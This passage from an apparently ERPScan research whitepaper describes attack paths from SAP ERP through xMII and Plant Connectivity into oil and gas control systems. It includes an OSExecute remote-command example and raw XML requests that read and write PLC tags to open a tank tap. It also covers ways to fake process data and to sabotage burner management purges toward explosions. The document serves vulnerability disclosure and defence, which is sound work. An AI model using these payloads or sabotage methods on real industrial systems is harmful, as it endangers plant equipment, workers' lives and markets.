–– SAP EAM (+AssetWise APM), Oracle EAM (Based on EBS), Schneider Electric’s Avantis EAM,
IBM Maximo
–– Connect with: OSIsoft® PI System, AspenTech® IP21, Honeywell® PHD
• LIMS <- Refinery
–– Custom app based on Oracle DBMS
• Tank Master Data (TMD) <- Tank Inventory
–– SAP IS-OIL-TAS, Aspentech
• Production Accounting System (PAS) <- Fiscal Metering
–– SAP IS-OIL-PRA

28
In real life, a simple scheme may look like this:

29
Attacking Oil and Gas
From the Internet to CORP
There are many ways how an attacker can get access to the corporate network. Here are some of the
most common options. You can find more examples in out previous SAP Security presentations.

• Via Internet resources (SAP Portal/CRM/SRM)

–– http://erpscan.com/wp-content/uploads/2013/07/SAP-Portal-Hacking-and-Forensics-
at-Confidence-2013.pdf
• Via Partners (SAP XI)
–– http://erpscan.com/wp-content/uploads/publications/SSRF-vs-Businness-critical-
applications-final-edit.pdf
• Via SAP Router
–– http://erpscan.com/advisories/dsecrg-13-013-saprouter-heap-overflow/
• Via Workstations (Trojans)
–– http://erpscan.com/wp-content/uploads/publications/SAP-Security-Attacking-SAP-
clients.pdf
• Via Unnecessary SAP Services exposed to the Internet
–– http://erpscan.com/wp-content/uploads/publications/SAP-Security-Attacking-SAP-
clients.pdf
From Internal (CORP) Network to ERP
An ERP system can be compromised in numerous ways:

• Vulnerabilities
• Misconfigurations
• Unnecessary privileges
• Custom code issues

30
Vulnerabilities

Misconfigurations
Enterprise applications are very complex. For example, only in SAP systems you can find:

• ~1500 profile parameters

• ~1200 web applications
• ~700 web services
• ~100 specific commands for MMC
• ~100 specific checks for each of the 50 modules (FI, HR, Portal, MM, CRM, SRM, PLM, Industry
solution…)

As you know, complexity kills security. All these configurations can be improperly implemented
thus allowing cybercriminals to obtain access to mission-critical systems. To minimize threats, we
recommend that you read SAP Security guides on our website.

Custom code issues

Domain specific languages in business applications (ABAP, PeopleCode, XSJS, X++) can have
vulnerabilities as well as backdoors left by 3rd party developers. [18]

Unnecessary privileges
Critical privileges and SoD issues

• For example, one can create a fake vendor and then approve payment order for this vendor.
• Usually ((~100 Roles X 10 actions)^2)/2=500k
• 500k potential conflicts for each user!
• It usually takes two years to decrease the number of conflicts from millions to hundreds.
• And you still will be vulnerable.

31
From ERP to OT
Now we are at the final stage, how to pivot from business applications to critical processes.

Typically, there are the following relations between them. Please keep in mind that it is just the tip of
the iceberg.

• SAP ERP -> SAP XMII -> SAP PCo -> DCS/SCADA -> PLC -> Meter
• SAP ERP -> SAP XMII -> SAP PCo -> PLC -> Meter
• SAP ERP -> SAP XMII -> DCS/SCADA(OPC) ->PLC-> Meter
• SAP ERP -> SAP PCo -> OPC Server -> PLC -> Meter
• SAP ERP -> SAP PCo -> PLC -> Meter
• SAP ERP(PP) -> SAP PI -> OPC-> PLC -> Meter
• SAP ERP(PP) -> SAP PI -> SAP xMII->OPC -> PLC -> Meter
• SAP PM (EAM) -> OsiSoft PI -> OPC
• SAP HANA (Rolta OneView) -> OPC/DCS ->PLC->Meter
• Oracle EAM ->OPC->PLC ?????
• Oracle DB (LIMS) -> DCS -> PLC-> Meter
• Domain Controller -> SAP PCo -> PLC -> Meter
• Shared SSH keys
• Similar passwords
• Improper firewall configurations

32
ERP as entry point
In this research, we will demonstrate four ways how vulnerabilities in business applications can lead to
security incidents.

Oracle EAM
Oracle Enterprise Asset Management is an application based on Oracle E-Busines Suite platform, thus,
every vulnerability that enables unauthorized access to Oracle EBS can be used to break into Oracle
EAM system. For instance, ERPScan experts have recently disclosed details of 6 vulnerabilities in Oracle
E-Business Suite. These issues are XSS Vulnerability, SQL Injection vulnerability, several XXE Injection
Vulnerabilities), and User Enumeration vulnerability. Some of them (SQL Injection, XXE Injections) allow
an attacker to gain unauthorized access to the business application with administrator rights.

SAP HANA
There are several possible paths to get a handle on the industrial processes. SAP HANA is an in-
memory database solution that combines database, application processing, and integration services
on a single platform.

It is a good option to store industrial processes data and manage it in real time. SAP HANA has
several critical vulnerabilities. At the end of September, we reported an unauthenticated remote code
execution vulnerability via a memory corruption bug. It is the perfect way to get an entrance ticket to
the OPC servers that are directly connected to HANA.

SAP Manufacturing Integration and

Intelligence
There are more common ways of interconnecting the ERP world to the industrial one. The prevalent
architecture uses the SAP xMII solution to collect industrial data from SAP Plant Connectivity (PCo) that
relays information sent from OPC server or DCS/SCADA systems.

MII stands for Manufacturing Integration and Intelligence. SAP MII provides a direct connection
between shop-floor systems and business operations.

SAP MII is a technology following the SAP xApps convention and running on an SAP NetWeaver
application server. SAP xApps are composite applications which can combine web services and data
from multiple systems. The application architecture is defined by the SAP Composite Application
Framework within the SAP NetWeaver platform. The framework includes methodology, tools, and run-
time environment to develop composite applications. It provides a consistent object model and allows
developers to build composite applications with a rich user interface, which can access multiple other
heterogeneous applications via services.

From an attacker’s point of view, it is a fertile ground for interesting vulnerabilities.

33
From a technical perspective, MII is accessed through its main application xmii~xapps~ears and
manages several servlets at different URL endpoints defined in a web.xml file. The web entry point is
defined as ‘XMII’. It means that if our server (by default) listens to the TCP port 50000, we should have
access to its MII part at the URL http://server:50000/XMII.

Getting admin rights on the Netweaver platform

SAP Netweaver stores its persistent data in a Sybase database. We can locate the tables where the
user encrypted credentials are stored, but how to get them?

By analyzing several servlets (non-MII related), we found several vulnerabilities and especially a blind
SQL injection that allows reading the content of SYSTEM tables anonymously and those owned by our
MII application under certain conditions.

With a time-based comparison between successful SQL requests and failing ones, we can get one
character per request the content of the hashed password of the Administrator. Another weakness in
the way the password is encrypted enables getting the clear text password.

While those problems are still being dealt by SAP, we can’t disclose any details.

Getting OS rights on the MII server

After obtaining those Administrator credentials, we can profit with the rich user experience provided by
the web admin interface. We, for instance, found out that through the «Log viewer» feature we can ask
the server to connect to a remote system on port 50013 with the protocol «SAP Instance Agent».

This functionality uses the SAPControl web services accessible via a SOAP web interface on TCP port
50013 to get information about server health. This service is offered by the daemon sapstartsrv that is
the parent of all the other SAP instances. It exposes a vast number of methods, as some of them have
several vulnerabilities like information disclosure and remote command execution in the past.

SAP Technical Documentation says about it:

«The SAP Start Service (sapstartsrv) provides basic management services for systems and
instances and single server processes. Services include starting and stopping, monitoring the
current run - time state, reading logs, traces and configuration files, executing commands and
retrieving other technology - specific information, like network access points, active sessions,
thread list etc. They are exposed by an SOAP Web service interface named «SAPControl»

Of course, the last part mentioning «executing command» will hold our attention.

Usually, the authentication methods of this SOAP service should be used with an OS level user account
(miiadm in this case), but there are some undocumented features.

34
If we open the port 50013 on our computer, we will see something like:

POST /SAPHostControl.cgi HTTP/1.1

Host: 172.16.2.31:50013
Content-Type: text/xml; charset=UTF-8
Connection: close
Authorization: Basic ezI[...]eA==
SAP-PASSPORT: 2A54482A0300E600[...]
Content-Length: 334
SOAPAction: «»
<?xml version=»1.0» encoding=»UTF-8» ?><SOAP-ENV:Envelope
xmlns:SOAP-ENV=»http://schemas.xmlsoap.org/soap/envelope/»
xmlns:xsi=»http://www.w3.org/2001/XMLSchema-instance»
xmlns:xs=»http://www.w3.org/2001/XMLSchema»><SOAP-
ENV:Body><yq1:GetVersionInfo
xmlns:yq1=’urn:SAPControl’></yq1:GetVersionInfo></SOAP-ENV:Body></
SOAP-ENV:Envelope>

When analyzing the reverse connection made by the server to our computer, we have noticed it uses
the HTTP header «Authorization» with credentials base64 encoded and sends an SOAP request,
assuming that we will have an SAP Control speaking service at our end. The server leaks us its internal
trusted account password (this password is random and changes every time the service is started).

If we use the SOAP method OSExecute() with this special account, we get a remote command
execution with ‘miiadm’ rights. With a custom SOAP python wrapper, we can easily consume this
service like this:

$ soap _ cli.py --host $SAPMII --port 50013 \

--user [redacted] --password [redacted] \
--method OSExecute /usr/bin/whoami
(200, (reply){
exitcode = 0
pid = 29342
lines =
(ArrayOfString){
item[] =
«miiadm»,
}
})
It doesn’t take too long to have an interactive shell with ‘miiadm’ user rights (without knowing its
password).

Even if this is not necessary to reach our goal, we can then read the Netweaver SecretStore files
(properties and key) to decrypt different accounts and passwords of the Sybase database because
they are readable by the miiadm user.

Another attack vector to get OS access on MII is to use a directory traversal and a file disclosure to
get the SecStore files, access Sybase with administrative rights and use the external procedure xp_
cmdshell if available.

35
SAP Plant Connectivity
SAP MII can get its industrial data through SAP Plant Connectivity (PCo). It acts like a bridge between
the industrial and ERP worlds. SAP PCo defines agents that send some tags from sources to a
destination (in this case, SAP MII) with a built-in decision engine.

The sources are, for instance, Matrikon OPC Server, Siemens Simatic or KEPServerEX, for the well-used
OPC implementations.

The setup between SAP MII and SAP PCo can follow two main modes:

• Notification mode
• Query mode

In case of the notification process, PCo sends its data to MII «Transactions» via a web service endpoint
and transmits user credentials via HTTP Basic Authentication. The connection can be secured via
SSL and there is a check box to allow connections with untrusted server certificate. By default, the
connection is done using HTTP.

36
As for an attacker sitting on MII, this connection mode doesn’t give a lot about PCo. So, let’s have a
look at the Query mode.

This mode allows MII to send queries to PCo and retrieve operational data. It uses a custom SAP
protocol designed over XML named xMII. The basics are to retrieve data and store data. PCo will
forward those requests to its sources that deliver the data.

In SAP MII, to enable this mode we need to add a new Data server with a connector type
PCoConnector. Then we need to fill either a URL to the PCo instance or to get registered our PCo
instance from the SLD (System Landscape Directory). The URL corresponding to the Management
SOAP service looks like this: http://pcoserver:50050/PCoManagement. We will come back to that soon.

37
The test connection that is made to the SOAP service requires valid Windows credentials. We notice
the agent port (by default, tcp/9000) that is retrieved from the configuration. It is through this port that
will be exchanged the special xMII packets.

Our question now is where and in what form those credentials are stored. We found out that the
SAPSR3DB.XMII_SERVERPROP contains all the data about data servers and the password is encrypted
with 3DES with the key being stored inside the SecureStorage service. The SecureStorage is used like a
vault, and each application gets a specific handle to access its own private data.

The first idea was to connect from the outside with our stolen NetWeaver admin credentials via
ICM to the service and dump the key associated to our xMII application, but it failed. The access to
SecureStorage is denied if it doesn’t come from a trusted execution path. Here a call stack validation is
enforced.

We didn’t get too far about circumventing that with modifying the xMII application (we still can deploy
code with admin rights) when we found out that we can just lower the encryption scheme to Base64.
Then it becomes trivial to SQLI the correct database column and return the clear text password of our
Windows PCo user.

So, we can control the PCo behavior from its SOAP authenticated endpoints – start and stop agent, get
information about sources, dump configuration, load a different configuration…

That is interesting, of course, but what about modifying the live data or fake them? That’s where the
query port tcp/9000 comes into play. By default, the communication is not authenticated. We can send
our own requests from our MII access and they will be forwarded to the industrial sources.

38
Disclosing data from industrial process
After having identified several (undisclosed) problems with the implementation of the server on PCo,
we can read the exported tags of the OPC server for all the running agents with our own xMII client. It
means raw industrial data from the shop-floor.

The xMII requests are ‘encapsulated’ in an XML message with the tag operations being sent as CDATA.
The asking, for instance, the value of the water level in our setup system based on a S7-1200 will look
like this:

<?xml version=»1.0» encoding=»UTF-8»?>

<pco:request xmlns:pco=»uri:sap-pco-request»
pco:version=»1.0»>
<pco:tag>
<![CDATA[RETRIEVE ‘TCPIP>S7>IW66’;]]>
</pco:tag>
</pco:request>

where the tag TCPIP>S6>IW66 was defined as an alias for the S7 memory value at address %IW66.

We can make the following parallel with files and directories in a typical filesystem with the groups and
tags from an OPC server. It means that if we want to know the base directories we will send the request
containing the CDATA ‘LIST GROUPS’. If we want to list the tags in a specific group, we send ‘LIST TAGS
IN «$GROUP» with $GROUP being replaced with the value received in the group list request. We can list
recursively all the tags available with one command ‘LIST TAGS RECURSIVELY’.

Modifying data
If there are exported tags with default read-write rights, we can use the STORE command to change
their value. That can be disastrous in some cases, of course.

We can use that in our setup to activate the water tap of our tank. The tag for the tap is at address
%M1.0 where a boolean is accessible with read and write access.

<?xml version=»1.0» encoding=»UTF-8»?>

<pco:request xmlns:pco=»uri:sap-pco-request»
pco:version=»1.0»>
<pco:tag>
<![CDATA[STORE ‘TCPIP>S7>M1.0’ = 1;]]>
</pco:tag>
</pco:request>

39
We have just opened the tap, and the water is flowing out of the tank now. We can monitor the water
level with the previous read command to memory%IW66 and when everything is done, we close the
tap with the similar operation, writing the «False» value to the memory address of the tap's tag.

<?xml version=»1.0» encoding=»UTF-8»?>

<pco:request xmlns:pco=»uri:sap-pco-request»
pco:version=»1.0»>
<pco:tag>
<![CDATA[STORE ‘TCPIP>S7>M1.0’ = 0;]]>
</pco:tag>
</pco:request>

Faking data
With this knowledge, we can build our own PCo server answering to the usual MII requests with
previously learned values while in the background disrupting the industrial process. We can control
agents states on the real PCo instance. The data server in MII configuration has just to be pointed to
our (local) service hosted on MII.

From ICS to Process

Burners and combustion
Control of the air/fuel ration is one of the most important functions of combustion/burner systems.
It must ensure that sufficient excess air is maintained every time. There are three components in the
fire triangle. If one of them is missing, the reaction cannot be sustained. However, if fuel is missing, the
system is safe, but if air or heat for ignition is missing, the situation is potentially dangerous, but for an
explosion to occur the fuel/air mixture must be within flammable range.

The basic strategy most commonly adopted to minimize the explosion risk is to ensure that flammable
mixtures do not accumulate anywhere within the plant. There is a number of potential sources of
flammable mixtures in furnace or process plant. If an attacker wants to commit sabotage and stop
operations by destructing burning process, he needs to be able to control any of those sources of
flammable mixtures.

The threats come as follows:

• Oil or gas leak into the combustion chamber through the burner as a result of leaking fuel shut off
valves.
• Deposits of coal or oil from previous firing periods were not properly purged from the system.
• The operation of the plant with insufficient combustion air results in CO an unburnt fuel in the
downstream ducting and dust collector. If the flame is not supplied with enough air, not all the fuel
can burn resulting in unburnt hydrocarbons and carbon monoxide being formed.

40
• Quenching of the flame by cold dust entering the furnace. Cold duct can reduce the temperature
below the ignition temperature. Gas flames, where the product is directly heated by the flame, are
particularly vulnerable to this problem, as the high ignition temperature of natural gas is required.
The highest one occurs during warm-up when the system is relatively cool or during serious
process upsets. When dust bellow 500 C is entrained in the combustion air, its thermal mass
reduces the flame temperature. If the amount of dust is excessive, it can cool parts of the flame
bellow the ignition temperature. If this occurs, unburnt gas is present in the combustion gasses
and there is a risk of an explosion. !!! a little amount of carbon monoxide is formed when flame
quenching happens, so this can only be detected by specific analyzers,
• Fuel enters the furnace as a result of repeated unsuccessful ignition attempts. This is a significant
risk with oil firing, particularly where the oil is not hot enough to ignite easily. A typical occasion
is cold oil remaining in pipes during shutdown. This is admitted to the furnace with each ignition
attempt but fails to ignite and stick to the walls. When hot oil finally arrives at the burner ignition is
achieved and the cold oil on the furnace walls is vaporized and ignited by the radiant heat from the
flame, the oil burns very rapidly and damaging pressure increase occurs.
–– Deposits of Oil are usually removed by the air purge. However, unstable and sub-
stoichiometric operation followed by a burner trip are not always removed by combustion
air pre-purge, especially cold viscous oil, and only manual cleaning can help here.
–– Another danger arises on plants where staff can access the BMS timers, in case of repeated
failures to ignite, they may shorten the purge time to reduce lost production costs. Usually,
the time is 10-20 minutes.

The burner management system performs a vital safety function preventing operator errors leading to
danger, and causing the safe shut-down of the burner in case of other equipment malfunction.

The main function of the BMS is to allow and ensure the safe start-up, operation, and shutdown of the
Fired Heater. Once the logic is configured and the system properly commissioned, BMS will provide
a safe and consistent operating sequence. The human interface will guide the operator so that the
heater can be safely operated and, if needed, be quickly and safely restarted.

The are two main types of failure which BMS should prevent:

• Failure to shut off fuel supply when a dangerous situation araises, for example, failure to close the
fuel valves following a loss of flame.
• Equipment failure that causes a dangerous function to occur, for example, a broken wire opening
the fuel valves.

Since BMS system manages all critical processes for burner safety, unauthorised access to BMS can
lead to multiple risks right up to explosion. The simplest attack to BMS System is to turn off the purge.
As mentioned before, cold oil left in pipes during the previous shut-downs can rapidly burn and
damage equipment.

41
Conclusion
The report has demonstrated that it is possible to perform four attack vectors and to penetrate into
business critical processes, which allows an attacker to carry out further attacks. Apart from risks
directly related to ICS systems, there are some other threats that might look less critical but in the
worst scenario, they may cost companies millions and disrupt whole business. Even there aren’t any
vulnerabilities in components of industrial systems, insecure configurations and not updated business
applications may put a company at the following risks:

Plant equipment sabotage

Hackers can fake data about temperature, pressure, and other conditions. For example, they can spoof
a report about a problem with equipment in a remote facility. Companies will spend a lot of time and
money to investigate the incident if this facility is situated somewhere in the middle of the ocean. This
can be done by exploiting the vulnerabilities described in our report. The easiest way to do so is to
hack an asset management solution.

Company Sabotage
Hackers can send fake information about oil quantity to managers who take their decisions based on
this data.

Assume that every day one sends information that there is much more oil in stocks that a company
has in reality. One day, the company will have sold out all the oil and would not be able to deliver it to
customers. The failure to perform the obligations could lead to a global scandal, changes in oil prices
and huge losses. Some of the tank information management solutions feature commands to PLC
devices to change values such as the maximum filling limit of tanks. In that case, hackers can send
those commands and perform a successful attack that leads to oil explosion.

Plant Destruction
BMS and some other critical systems are used in numerous processes including Separation и Refinery.
Some of the critical systems not only send information, but also allow you to manage them through
third-party systems like ERP, EAS, and LIMS remotely via intermediate systems SAP PCo and SAP xMII,
and some of the solutions allow sending particular commands to PLC from ERP/MES system. PCo
provides a framework to create custom agents, which can be used to send commands to PLC. This is
one of the ways to attack ICS even there are not any vulnerabilities in PLC/SCADA/DCS.

42
Vulnerabilities in industrial systems can be exploited if one has an access to the industrial network
because of insecure separation between IT and OT networks. Then a company will face all the risks
listed at the beginning of the document: Plant Sabotage/Shutdown Equipment damage Utilities
Interruption Production Disruption (stop or pause manufacturing process) Product Quality (bad oil and
Gas quality) Undetected Spills Illegal taping Compliance violation (pollution) Safety violation (death or
injury).

Oil market fraud

Imagine what would happen if a cyber criminal uploads a malware that dynamically changes oil stock
information in all Oil and Gas companies where SAP is implemented. According to the SAP’s statement,
companies using SAP solutions produce more that 70 million barrels per day of oil. Oil Market Report
says that oil production totals over 94 million barrels every day. If the attack is successful, cyber
criminals can control about 75% of total Oil production. They can deliberately understate data about
Oil in stocks of affected companies to increase Oil prices, or vice versa.

Described attacks can be conducted by exploiting SAP xMII and SAP Plant Connectivity solutions that
transfer data from Tank Management Systems to SAP Systems such as SAP IS-Oil. With the help of
this multi-stage attack, cyber criminals can modify parameters regarding oil quantity in stocks. What’s
more important, SAP systems are connected with Tank Information Management solutions. Some
of them such as Emerson Rosemount TankMaster allow commands to PLC devices to change values
like the maximum filling limit of tanks. In that case, by gaining access to Tank Management Systems
hackers can send these commands and perform a successful attack that can lead to oil explosion.

43
References
1. Hackers’ Favorite Target: Big Oil and All That Deadly Equipment http://www.bloomberg.com/
news/articles/2015-06-10/hackers-favorite-target-big-oil
2. The GasPot Experiment: Unexamined Perils in Using Gas-Tank-Monitoring Systemshttps://www.
blackhat.com/docs/us-15/materials/us-15-Wilhoit-The-Little-Pump-Gauge-That-Could-
Attacks-Against-Gas-Pump-Monitoring-Systems-wp.pdf
3. Telvent Hit by Sophisticated Cyber-Attack, SCADA Admin Tool Compromised http://www.
securityweek.com/telvent-hit-sophisticated-cyber-attack-scada-admin-tool-compromised
4. Hackers Launch All-Out Assault on Norway’s Oil and Gas Industry http://motherboard.vice.com/
read/hackers-target-300-norwegian-oil-and-energy
5. Internet attack could shut down US gas stations http://arstechnica.com/security/2015/01/
internet-attack-could-shut-down-us-gasoline-stations/
6. Oil and Gas Production Handbook http://www.saudienergy.net/PDF/Intro%20Oil.pdf
7. Data Sheet “Net Oil & Gas Solution” http://iom.invensys.com/EN/pdfLibrary/Datasheet_
Foxboro_Net%20Oil%20and%20Gas%20Solution_10-13.pdf
8. Burner Management System Solutions http://iom.invensys.com/EN/pdfLibrary/Brochure_
Triconex_BurnerManagementSystemSolutions_08-10.pdf
9. Burner Management Systems http://www2.emersonprocess.com/en-us/brands/deltav/sis/
applications/pages/bms.aspx
10. Burner Management System SIMATIC BMS400F http://www.industry.usa.siemens.com/topics/
us/en/bms/bmsinformation/Documents/BMSBrochureAPPROVED.pdf
11. Burner Management System (BMS) - Safety Solution for the Power Generation Industry https://
www.honeywellprocess.com/en-US/explore/products/control-monitoring-and-safety-
systems/safety-systems/Pages/burner-management-system.aspx
12. Custody transfer https://en.wikipedia.org/wiki/Custody_transfer
13. Oil and Gas Custody Transfer http://www2.emersonprocess.com/siteadmincenter/PM%20Articles/
Oil-and-Gas-Custody-Transfer_petroleum_africa_may_2014.pdf
14. Best Practices for DanPac Express Cyber Security http://www2.emersonprocess.com/
siteadmincenter/PM%20Daniel%20Documents/Whitepaper_DanPac%20Express%20
Cyber%20Security%20Best%20Practices.pdf

44
15. FloBoss S600+ Flow Computer http://www.documentation.emersonprocess.com/groups/
public/documents/specification_sheets/d301151x012.pdf
16. Oil refinery https://en.wikipedia.org/wiki/Oil_refinery
17. Oracle Field Service http://www.oracle.com/us/products/applications/056938.pdf
18. Analysis of 300 vulnerabilities in SAP http://erpscan.com/wp-content/uploads/
publications/3000-SAP-notes-Analysis-by-ERPScan.pdf

45
Additional reading
• The GasPot Experiment: Unexamined Perils in Using Gas-Tank-Monitoring Systems
–– https://www.blackhat.com/docs/us-15/materials/us-15-Wilhoit-The-Little-Pump-
Gauge-That-Could-Attacks-Against-Gas-Pump-Monitoring-Systems-wp.pdf
• Rocking-The-Pocket-Book-Hacking-Chemical-Plant-For-Competition-And-Extortion
–– https://www.blackhat.com/docs/us-15/materials/us-15-Krotofil-Rocking-The-Pocket-
Book-Hacking-Chemical-Plant-For-Competition-And-Extortion.pdf
–– http://blackhat.com/docs/us-14/materials/us-14-Larsen-Miniturization.pdf
• Physical Damage 101: Bread and Butter Attacks
–– https://www.blackhat.com/docs/us-15/materials/us-15-Larsen-Remote-Physical-
Damage-101-Bread-And-Butter-Attacks.pdf

46
About ERPScan
ERPScan is the most respected and credible Business Application Security provider. Founded in 2010,
the company operates globally. Named as an ‘Emerging vendor’ in Security by CRN and distinguished by
more than 30 other awards - ERPScan is the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf supporting in improving security of their
latest solutions.

ERPScan’s primary mission is to close the gap between technical and business security, and provide
solutions to evaluate and secure ERP systems and business-critical applications from both, cyber-attacks
as well as internal fraud. Usually our clients are large enterprises, Fortune 2000 companies and managed
service providers whose requirements are to actively monitor and manage security of vast SAP landscapes
on a global scale.

Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative
software is the only solution in the market certified by SAP SE covering all tiers of SAP security i.e. vul-
nerability assessment, source code review and Segregation of Duties. The largest companies from across
diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting
companies have successfully deployed the software. ERPScan Monitoring Suite for SAP is specifically
designed for enterprise systems to continuously monitor changes in multiple SAP systems. It generates
and analyzes trends on user friendly dashboards, manages risks, tasks and can export results to external
systems. These features enable central management of SAP system security with minimal time and effort.

We use ‘follow the sun’ principle and function in two hubs, located in the Netherlands and the US to operate
local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber
threats in real time while providing an agile customer support.

47
About ERPScan
Research Team
The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerabil-
ity research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from
the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for exposing in excess of 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proudly to expose new types of vulnerabilities (TOP 10 Web hacking techniques
2012) and were nominated for best server-side vulnerability in BlackHat 2013.

ERPScan experts have been invited to speak, present and train at 60+ prime international security confer-
ences in 25+ countries across the continents. These include BlackHat, RSA, HITB as well as private train-
ings for SAP in several Fortune 2000 companies.

ERPScan researchers lead project EAS-SEC, which is focused on enterprise application security research
and awareness. They have published 3 exhaustive annual award-winning surveys about SAP Security.

ERPScan experts have been interviewed by leading media resources and specialized info-sec publications
worldwide, these include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise
and Chinabyte to name a few.

We have highly qualified experts in staff with experience in many different fields of security, from web appli-
cations and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experi-
ence to conduct research in SAP system security.

48
Our Contacts
Global Headquarters: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

EMEA Headquarters: Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam

Phone: +31 20 8932892

Twitter: @erpscan

Web: www.erpscan.com

Contact: [email protected]

PR: [email protected]

Products
• ERPScan Security Monitoring Suite for SAP
• ERPScan Security Scanner for SAP
• ERPScan Security Monitoring Suite for Oracle Peoplesoft

Services
• SAP Vulnerability Assessment
• SAP Security Audit
• SAP Security Trainings
• SAP Custom code security review
• SAP Penetration testing

49